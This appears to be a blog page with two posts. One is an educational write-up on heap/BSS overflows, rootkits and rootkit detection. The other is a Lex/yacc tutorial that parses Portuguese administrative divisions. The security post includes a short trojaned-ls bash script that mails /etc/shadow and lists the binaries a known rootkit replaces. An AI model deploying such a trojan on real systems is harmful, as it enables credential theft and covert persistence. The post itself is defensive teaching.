Tracing the attack – Part II

22 01 2009


This post is the continuation of Tracing the attack – Part I. And this post is the final one, of this stack.
Here I’m gonna to talk about the Heap/BSS Overflow and Rootkits.


In the Stack, the memory is allocated by kernel (as explained in Part I). In the other hand the Heap is a structure where the program can dynamically allocate memory. With the use of malloc(), realloc() and calloc() functions.

BSS segment

BSS stands for Block Started by Symbol and is used by compilers to store static variables. This variables are filled with zer-valued data at the start of the program. In C programing language all the not initialized and declared as static variables are placed in the BSS segment.

Heap/BSS Overflow

As a simple example, extracted from w00w00 article, to demonstrate a heap overflow:

   /* demonstrates dynamic overflow in heap (initialized data) */
   #define BUFSIZE 16
   #define OVERSIZE 8 /* overflow buf2 by OVERSIZE bytes */

   int main()
      u_long diff;
      char *buf1 = (char *)malloc(BUFSIZE), *buf2 = (char *)malloc(BUFSIZE);

      diff = (u_long)buf2 - (u_long)buf1;
      printf("buf1 = %p, buf2 = %p, diff = 0x%x bytesn", buf1, buf2, diff);

      memset(buf2, 'A', BUFSIZE-1), buf2[BUFSIZE-1] = '';

      printf("before overflow: buf2 = %sn", buf2);
      memset(buf1, 'B', (u_int)(diff + OVERSIZE));
      printf("after overflow: buf2 = %sn", buf2);

      return 0;

Now, when we execute this code with parameter 8:

   [root /w00w00/heap/examples/basic]# ./heap1 8
   buf1 = 0x804e000, buf2 = 0x804eff0, diff = 0xff0 bytes
   before overflow: buf2 = AAAAAAAAAAAAAAA
   after overflow: buf2 = BBBBBBBBAAAAAAA

This works like that, because buf1 overruns its boundary and write data in buf2 heap space. This program don’t crash because buf2 heap space still a valid segment.

To see a BSS overflow we just have to replace the:
‘char *buf = malloc(BUFSIZE)’, by: ‘static char buf[BUFSIZE]’

If the heap is non-executable that will prevent the use of function calls there. But even so, that won’t prevent heap overflows.

I won’t talk anymore about that subject in this post, if you want to learn more about that you can see the w00w00 article, and some-more from the references section (at the end of this post).


After gaining access the target machine (using an exploit for example), the attacker must ensure will continue to have access even after the victim has fixed the vulnerability, and without it knows that the system remains compromised. And the attacker can achieve this through the installation of a rootkit on the target machine.
A rootkit is basically a set of tools (backdoors and trojan horses) designed with the aim to provide absolute control of the target machine. A backdoor is a way to authenticate a legitimate machine, providing remote access the same while trying to remain undetected. For example, you can take the form of a program or a change in a program already installed. A trojan horse (or just textittrojan) is usually a program that supposedly plays a role but which actually also plays other malicious functions without the knowledge of the victim.
Then we show a very simple example of a bash script that creates a possible trojaned ls:

#!/ bin/bash
mv /bin/ls /bin/ls.old
/bin/echo "cat /etc/shadow | mail" > /bin/ls
/bin/echo "/ bin/ls.old" >> /bin/ls
chmod +x /bin/ls

It is clear that we are not considering the fact that the ls can receive arguments, this is just for example purposes. And is good to show an example of the objective of a trojan.

Usually the use of a real trojan would install a modified versions of several binary (lsof, ps, etc). The idea of changing this programs is to hide the trojan itself. With a ps changed command, the user could not see the trojan process running.

Here is a list of the changed programs when you install Linux Rootkit 4:

bindshell	port/shell type daemon!
chfn		Trojaned! User > r00t
chsh		Trojaned! User > r00t
crontab     Trojaned! Hidden Crontab Entries
du		Trojaned! Hide files
find		Trojaned! Hide files
fix		File fixer!
ifconfig	Trojaned! Hide sniffing
inetd		Trojaned! Remote access
killall		Trojaned! Wont kill hidden processes
linsniffer	Packet sniffer!
login		Trojaned! Remote access
ls             Trojaned! Hide files
netstat      Trojaned! Hide connections
passwd	Trojaned! User > r00t
pidof		Trojaned! Hide processes
ps		Trojaned! Hide processes
rshd		Trojaned! Remote access
sniffchk	Program to check if sniffer is up and running
syslogd	Trojaned! Hide logs
tcpd		Trojaned! Hide connections, avoid denies
top		Trojaned! Hide processes
wted		wtmp/utmp editor!
z2		Zap2 utmp/wtmp/lastlog eraser!

There are many rootkits over the network, the most common, compromise Windows and Unix systems.

Detecting and removing rootkits

When someone suspect that his system have been compromised, the best thing wold be use some tool to detect and remove rootkits. We have, for Linux: chkrootkit and rkhunter and for Windows you can use the RootkitRevealer.

As curious, I would like to mention that in 2005, Sony BMG put a rootkit in several CDs of music that is self-installed (without notice) on computers where the CDs were read, for more about this.


As we saw, an attacker start of using a scanner against a particular range of ip’s, would then see if there are services available, then do a dictionary attack using the country’s victim language, extracted from the IP. Or could also detect vulnerabilities in the system, that he could use to gain access. After having access to the computer the attacker terminate by installing a rootkit to gain permanent access to this system.

As a bonus I also explain some minimalistic examples of how can someone, that have physical access to a system, can gain root access to it exploiting some programs that are running in that system.

This area is so vast that is still impossible to predict the ways to do an attack. Imagine that an attacker gain access to a computer, but they don’t have root credentials. Attackers probably will try to exploit some programs that are running in that systems…




31 07 2008


Since long ago that I wanted to write about this. Finally I now have the time to write about syntactic analyzers generators.

When I was studding yacc noticed that there was much information available, not something one would expect of a tool with 40 years. Unfortunately there was no quick learning for someone who already knew the whole theory behind this kind of tools. As I said, the yacc is a very old tool, made when was needed compilers. Before there the whole theory of that area that we know today. So it is normal small errors transform themselves into disasters that may take a long time to be resolved.

This post is for those who already know what grammars are, lexical analyzers, etc., but that never touch in Lex/yacc or for those who are stuck with this things (I hope).

In this post I will explain to you Lex/yacc, with an example of a program that I did. I will not boring you with massive lines of code (like I usually do), because Lex/yacc is just a simple tool to use. With just 60 lines of explained code you will see how great that is.

The problem

My idea was to do a simple site with all the information about all the cities in Portugal. After reminded me to so but to all parishes (Freguesia in Portuguese), counties(Concelho in Portuguese) and districts(Distrito in Portuguese) of Portugal and their relationship. A district has many counties and one county has many parishes.

Simple! What I needed now was all the names of all parishes, counties and districts of Portugal, I eventually found three files with all this information and more in the Portuguese company of post office website. Better yet, these files had the relationship between each division. I have to do a small program in C that take those three files and create a new file, which I use on the Lex / yacc.

In order to have all available information on each local od Portugal I decided to use Wikipedia. This is the Achilles heel of the program, because unfortunately the entries of wikipedia on the Portuguese parishes are not uniform and many of the parishes or have entry. But still able to have good results.

The structure of the new file generated is:



It have about 43000 lines, the number of parishes in Portugal.


An Yacc file is just like an lex file, it is divided in three parts:


I Will explain later on, what to put in all those three parts.

The solution

I start to write the following grammar to describe my new file:

OrGeo     -> Districts

Districts -> District '|'
          | Districts District '|'

Distrito  -> IdD Link Counties

Counties -> Countie
          | Counties ';' Countie

Countie  -> Parishes '!' IdC Link

Parishes    -> Parish
          | Parishes ',' Parish

Link      -> '>' l

IdD       -> id

IdC       -> id

Parish     -> IdL Link

IdL       -> id

As id is a name (of the District, Countie or Parish), we will declare it in yacc as a pointer to chars (vals). To do that we create a union like in the first part of yacc file (DECLARATIONS), and add a association with vals with id and l:

%union {
        char *vals;

%token  id l

Yacc use that union because you can declare as many associations as you want. We must refer to that union in the lex as yylval.

This is the same as use:

%token  id
%token  l

We now go to lex file and add the rule that the lexical analyzer will meet when find text.

[ a-zA-ZÀ-ú-'.()/'`0-9]+  { yylval.vals = strdup(yytext);
                                    return id; }
[a-zA-ZÀ-ú-'.()/'`0-9_:]+ { yylval.vals = strdup(yytext);
                                    return l; }

Here we are saying that when lex find some text that fills in that regular expression it will return to yacc as an id, so that way we find the names of our cities, or links.

As you can see we have special symbols in our grammar, (!>,;|), so we need to say to lex to return them to yacc, where we need them:

[!>,;|]                           { return yytext[0]; }

I also will say to lex ignore all n and t characters:

[tn]                            { ; }

Making our grammar powerfull

Now our grammar will suffer some adjustments; we will say yacc what to do when it was in some of the derivations of some rule:

OrGeo     : Districts { d = $1; }
Districts : District '|' { $$ = $1; }
          | Districts District '|' { $$ = catDistricts($1,$2); }
District  : IdD Link Counties { $$ = addDistrict($1, $2, $3); }
Counties : Countie { $$ = $1; }
          | Counties ';' Countie { $$ = catCounties($1, $3); }
Countie  : Parishes '!' IdC Link { $$ = addCountie($1, $3, $4); }
Parishes    : Parish { $$ = $1; }
          | Parishes ',' Parish { $$ = catParishes($1, $3); }
Link      : '>' l { $$ = $2; }
IdD       : id { $$ = $1; }
IdC       : id { $$ = $1; }
Parish     : IdL Link { $$ = addParish($1, $2); }
IdL       : id { $$ = $1; }

Here we tell yacc how to behave when pass certain derivation of a rule.
We can tell yacc that some rule can return a data type, for example:

#include "district.h"

District *d;

%union {
        char *vals;
        Parish *valf;
        Countie *valc;
        District *vald;

%type   Link IdL IdD IdC
%type   Parish Parishes
%type   Countie Counties
%type   District Districts

To return something in a rule we refer to that rule as $$, that mean IdL in

IdL       : id

and $1 to refer to that id, and so on. So, that way we can say that $$ = $1, that means, IdL = id.

Funtions catDistricts, addDistrict, addParish, addCountie, catCounties and catParishes, are just functions to create linked list’s and append new elemt’s in one already existent linked list.

The result is a html page with nested liked lists, here is the result.


All the code, including the code to generate the new file, used to yacc is available here, fell free to use it.